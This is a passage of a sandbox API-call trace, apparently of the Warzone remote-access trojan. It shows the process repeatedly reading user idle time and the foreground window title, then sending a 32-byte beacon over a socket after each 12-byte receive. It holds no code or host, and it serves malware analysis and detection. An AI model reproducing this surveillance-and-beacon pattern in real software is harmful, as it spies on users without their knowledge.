[0202.172] GetProcessHeap () returned 0x900000 [0202.172] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0202.172] GetProcessHeap () returned 0x900000 [0202.172] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0202.172] GetProcessHeap () returned 0x900000 [0202.172] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0202.172] GetProcessHeap () returned 0x900000 [0202.172] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9e62d8 [0202.174] GetProcessHeap () returned 0x900000 [0202.174] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x4260048 [0202.174] GetProcessHeap () returned 0x900000 [0202.174] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9e62d8 | out: hHeap=0x900000) returned 1 [0202.175] GetProcessHeap () returned 0x900000 [0202.175] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0202.175] GetProcessHeap () returned 0x900000 [0202.175] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0202.175] GetProcessHeap () returned 0x900000 [0202.175] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9e62d8 [0202.176] GetProcessHeap () returned 0x900000 [0202.176] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0202.176] GetProcessHeap () returned 0x900000 [0202.176] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260048 | out: hHeap=0x900000) returned 1 [0202.177] GetProcessHeap () returned 0x900000 [0202.177] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x4260048 [0202.178] GetProcessHeap () returned 0x900000 [0202.178] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960850 [0202.178] GetProcessHeap () returned 0x900000 [0202.178] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x93af70 [0202.179] GetProcessHeap () returned 0x900000 [0202.179] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499d8 [0202.180] GetProcessHeap () returned 0x900000 [0202.180] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0202.180] GetProcessHeap () returned 0x900000 [0202.180] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x93af70 [0202.180] GetProcessHeap () returned 0x900000 [0202.180] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499d8 | out: hHeap=0x900000) returned 1 [0202.180] GetProcessHeap () returned 0x900000 [0202.180] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499d8 [0202.180] GetProcessHeap () returned 0x900000 [0202.180] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x970fd0, Size=0x7fa00) returned 0x2d00020 [0202.183] SetEvent (hEvent=0x144) returned 1 [0202.183] GetProcessHeap () returned 0x900000 [0202.183] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499d8 | out: hHeap=0x900000) returned 1 [0202.183] GetProcessHeap () returned 0x900000 [0202.183] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0202.183] GetProcessHeap () returned 0x900000 [0202.183] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9e62d8 | out: hHeap=0x900000) returned 1 [0202.186] GetProcessHeap () returned 0x900000 [0202.186] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260048 | out: hHeap=0x900000) returned 1 [0202.186] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0210.896] GetProcessHeap () returned 0x900000 [0210.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e778 [0210.896] GetProcessHeap () returned 0x900000 [0210.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262748 [0210.896] GetProcessHeap () returned 0x900000 [0210.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262760 [0210.896] GetProcessHeap () returned 0x900000 [0210.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262778 [0210.896] GetProcessHeap () returned 0x900000 [0210.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262790 [0210.896] GetProcessHeap () returned 0x900000 [0210.896] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0210.896] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e778 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e778 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262790 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262748 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262778 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262790 [0210.897] GetProcessHeap () returned 0x900000 [0210.897] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e778 | out: hHeap=0x900000) returned 1 [0210.897] GetProcessHeap () returned 0x900000 [0210.898] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0210.898] GetProcessHeap () returned 0x900000 [0210.898] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x0) returned 0x934958 [0210.898] GetProcessHeap () returned 0x900000 [0210.898] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934878 [0210.898] GetLastInputInfo (in: plii=0x33f450 | out: plii=0x33f450) returned 1 [0210.898] GetTickCount () returned 0x1141fd1 [0210.898] GetForegroundWindow () returned 0x10058 [0210.898] GetWindowTextW (in: hWnd=0x10058, lpString=0x33f238, nMaxCount=256 | out: lpString="Start") returned 5 [0210.898] lstrlenW (lpString="Start") returned 5 [0210.898] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0210.899] lstrlenW (lpString="Start") returned 5 [0210.899] lstrcpyW (in: lpString1=0x2cd0000, lpString2="Start" | out: lpString1="Start") returned="Start" [0210.899] GetProcessHeap () returned 0x900000 [0210.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934978 [0210.899] lstrlenW (lpString="Start") returned 5 [0210.899] GetProcessHeap () returned 0x900000 [0210.899] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934978, Size=0x8) returned 0x934988 [0210.899] lstrlenW (lpString="Start") returned 5 [0210.899] GetProcessHeap () returned 0x900000 [0210.899] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934988, Size=0x14) returned 0x960870 [0210.899] GetProcessHeap () returned 0x900000 [0210.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934988 [0210.899] GetProcessHeap () returned 0x900000 [0210.899] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934988, Size=0x8) returned 0x934978 [0210.899] GetProcessHeap () returned 0x900000 [0210.900] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934978, Size=0xc) returned 0x4262778 [0210.900] GetProcessHeap () returned 0x900000 [0210.900] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4262778, Size=0x20) returned 0x42604e8 [0210.900] GetProcessHeap () returned 0x900000 [0210.900] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260510 [0210.900] GetProcessHeap () returned 0x900000 [0210.900] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x960870 | out: hHeap=0x900000) returned 1 [0210.900] GetProcessHeap () returned 0x900000 [0210.900] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42604e8 | out: hHeap=0x900000) returned 1 [0210.900] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0210.900] lstrlenA (lpString="warzone160") returned 10 [0210.900] lstrlenA (lpString="warzone160") returned 10 [0210.900] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0210.901] lstrcpyA (in: lpString1=0x2cd0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0210.901] lstrlenA (lpString="warzone160") returned 10 [0210.901] GetProcessHeap () returned 0x900000 [0210.901] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262778 [0210.901] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0210.901] GetProcessHeap () returned 0x900000 [0210.901] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x42604e8 [0210.901] GetProcessHeap () returned 0x900000 [0210.901] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262748 [0210.901] GetProcessHeap () returned 0x900000 [0210.901] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260538 [0210.901] GetProcessHeap () returned 0x900000 [0210.902] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260560 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260538 | out: hHeap=0x900000) returned 1 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42604e8 | out: hHeap=0x900000) returned 1 [0210.902] send (s=0x228, buf=0x4260560*, len=32, flags=0) returned 32 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260560 | out: hHeap=0x900000) returned 1 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260510 | out: hHeap=0x900000) returned 1 [0210.902] GetProcessHeap () returned 0x900000 [0210.902] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0210.902] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262790 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262778 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262748 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262790 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262778 [0230.911] GetProcessHeap () returned 0x900000 [0230.911] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262748 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934958 | out: hHeap=0x900000) returned 1 [0230.912] GetProcessHeap () returned 0x900000 [0230.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934958 [0230.912] GetLastInputInfo (in: plii=0x33f450 | out: plii=0x33f450) returned 1 [0230.912] GetTickCount () returned 0x1146df0 [0230.912] GetForegroundWindow () returned 0x10058 [0230.912] GetWindowTextW (in: hWnd=0x10058, lpString=0x33f238, nMaxCount=256 | out: lpString="Start") returned 5 [0230.912] lstrlenW (lpString="Start") returned 5 [0230.912] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0230.913] lstrlenW (lpString="Start") returned 5 [0230.913] lstrcpyW (in: lpString1=0x2cd0000, lpString2="Start" | out: lpString1="Start") returned="Start" [0230.913] GetProcessHeap () returned 0x900000 [0230.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934978 [0230.913] lstrlenW (lpString="Start") returned 5 [0230.913] GetProcessHeap () returned 0x900000 [0230.913] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934978, Size=0x8) returned 0x934988 [0230.913] lstrlenW (lpString="Start") returned 5 [0230.913] GetProcessHeap () returned 0x900000 [0230.913] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934988, Size=0x14) returned 0x960870 [0230.913] GetProcessHeap () returned 0x900000 [0230.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934988 [0230.914] GetProcessHeap () returned 0x900000 [0230.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934988, Size=0x8) returned 0x934978 [0230.914] GetProcessHeap () returned 0x900000 [0230.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934978, Size=0xc) returned 0x4262760 [0230.914] GetProcessHeap () returned 0x900000 [0230.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4262760, Size=0x20) returned 0x4260510 [0230.914] GetProcessHeap () returned 0x900000 [0230.914] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260560 [0230.914] GetProcessHeap () returned 0x900000 [0230.914] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x960870 | out: hHeap=0x900000) returned 1 [0230.914] GetProcessHeap () returned 0x900000 [0230.914] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260510 | out: hHeap=0x900000) returned 1 [0230.914] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.914] lstrlenA (lpString="warzone160") returned 10 [0230.914] lstrlenA (lpString="warzone160") returned 10 [0230.914] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0230.915] lstrcpyA (in: lpString1=0x2cd0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0230.915] lstrlenA (lpString="warzone160") returned 10 [0230.915] GetProcessHeap () returned 0x900000 [0230.915] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262760 [0230.915] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.915] GetProcessHeap () returned 0x900000 [0230.915] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260510 [0230.915] GetProcessHeap () returned 0x900000 [0230.915] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262790 [0230.915] GetProcessHeap () returned 0x900000 [0230.915] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x42604e8 [0230.915] GetProcessHeap () returned 0x900000 [0230.916] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260538 [0230.916] GetProcessHeap () returned 0x900000 [0230.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42604e8 | out: hHeap=0x900000) returned 1 [0230.916] GetProcessHeap () returned 0x900000 [0230.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0230.916] GetProcessHeap () returned 0x900000 [0230.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260510 | out: hHeap=0x900000) returned 1 [0230.916] send (s=0x228, buf=0x4260538*, len=32, flags=0) returned 32 [0230.916] GetProcessHeap () returned 0x900000 [0230.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260538 | out: hHeap=0x900000) returned 1 [0230.916] GetProcessHeap () returned 0x900000 [0230.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0230.916] GetProcessHeap () returned 0x900000 [0230.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260560 | out: hHeap=0x900000) returned 1 [0230.916] GetProcessHeap () returned 0x900000 [0230.917] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0230.917] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262760 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262790 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262778 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262748 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x42627a8 [0250.912] GetProcessHeap () returned 0x900000 [0250.912] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262748 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262760 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262790 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262778 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262790 | out: hHeap=0x900000) returned 1 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x4262748 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262778 | out: hHeap=0x900000) returned 1 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x0) returned 0x934978 [0250.913] GetProcessHeap () returned 0x900000 [0250.913] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934988 [0250.913] GetLastInputInfo (in: plii=0x33f450 | out: plii=0x33f450) returned 1 [0250.913] GetTickCount () returned 0x114bbe0 [0250.913] GetForegroundWindow () returned 0x10058 [0250.913] GetWindowTextW (in: hWnd=0x10058, lpString=0x33f238, nMaxCount=256 | out: lpString="Start") returned 5 [0250.913] lstrlenW (lpString="Start") returned 5 [0250.913] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0250.914] lstrlenW (lpString="Start") returned 5 [0250.914] lstrcpyW (in: lpString1=0x2cd0000, lpString2="Start" | out: lpString1="Start") returned="Start" [0250.914] GetProcessHeap () returned 0x900000 [0250.914] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934998 [0250.914] lstrlenW (lpString="Start") returned 5 [0250.914] GetProcessHeap () returned 0x900000 [0250.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934998, Size=0x8) returned 0x9349a8 [0250.914] lstrlenW (lpString="Start") returned 5 [0250.914] GetProcessHeap () returned 0x900000 [0250.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9349a8, Size=0x14) returned 0x960890 [0250.914] GetProcessHeap () returned 0x900000 [0250.914] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x9349a8 [0250.914] GetProcessHeap () returned 0x900000 [0250.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9349a8, Size=0x8) returned 0x934998 [0250.914] GetProcessHeap () returned 0x900000 [0250.914] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934998, Size=0xc) returned 0x4262778 [0250.915] GetProcessHeap () returned 0x900000 [0250.915] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4262778, Size=0x20) returned 0x4260560 [0250.915] GetProcessHeap () returned 0x900000 [0250.915] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260538 [0250.915] GetProcessHeap () returned 0x900000 [0250.915] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x960890 | out: hHeap=0x900000) returned 1 [0250.915] GetProcessHeap () returned 0x900000 [0250.915] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260560 | out: hHeap=0x900000) returned 1 [0250.915] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0250.915] lstrlenA (lpString="warzone160") returned 10 [0250.915] lstrlenA (lpString="warzone160") returned 10 [0250.915] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0250.916] lstrcpyA (in: lpString1=0x2cd0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0250.916] lstrlenA (lpString="warzone160") returned 10 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262778 [0250.916] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260560 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x42627a8 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x4260510 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x20) returned 0x42604e8 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260510 | out: hHeap=0x900000) returned 1 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42627a8 | out: hHeap=0x900000) returned 1 [0250.916] GetProcessHeap () returned 0x900000 [0250.916] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260560 | out: hHeap=0x900000) returned 1 [0250.916] send (s=0x228, buf=0x42604e8*, len=32, flags=0) returned 32 [0250.917] GetProcessHeap () returned 0x900000 [0250.917] 